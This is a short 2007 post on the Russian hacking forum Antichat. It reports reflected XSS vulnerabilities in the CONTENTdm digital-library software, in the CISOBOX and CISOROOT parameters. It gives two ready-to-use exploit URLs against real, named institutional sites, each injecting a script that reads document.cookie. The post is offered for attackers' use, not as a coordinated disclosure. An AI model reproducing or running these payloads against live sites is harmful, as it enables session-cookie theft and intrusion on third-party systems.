15.11.2007, 04:39
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
CONTENTdm
Пассивные XSS:
1) в скрипте results.php уязвимы переменная CISOBOX1, CISOBOX2 и т.д.
кстати найдена мной 05.07.2007
а в багтраках появилась только 06.08.2007, так что если и баян, то свой, так сказать для полноты сюда запостил
2) во многих скриптах в переменной CISOROOT
примеры:
Код:
http://contentdm.nitle.org/cdm4/item_viewer.php?CISOROOT=%3Cscript%3Ealert(document.cookie);%3C/script%3E
Код:
http://mdc.cbuc.cat/cdm4/document.php?CISOROOT=%3Cscript%3Ealert(document.cookie);%3C/script%3E
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 15.11.2007 в 04:42..
|
|
|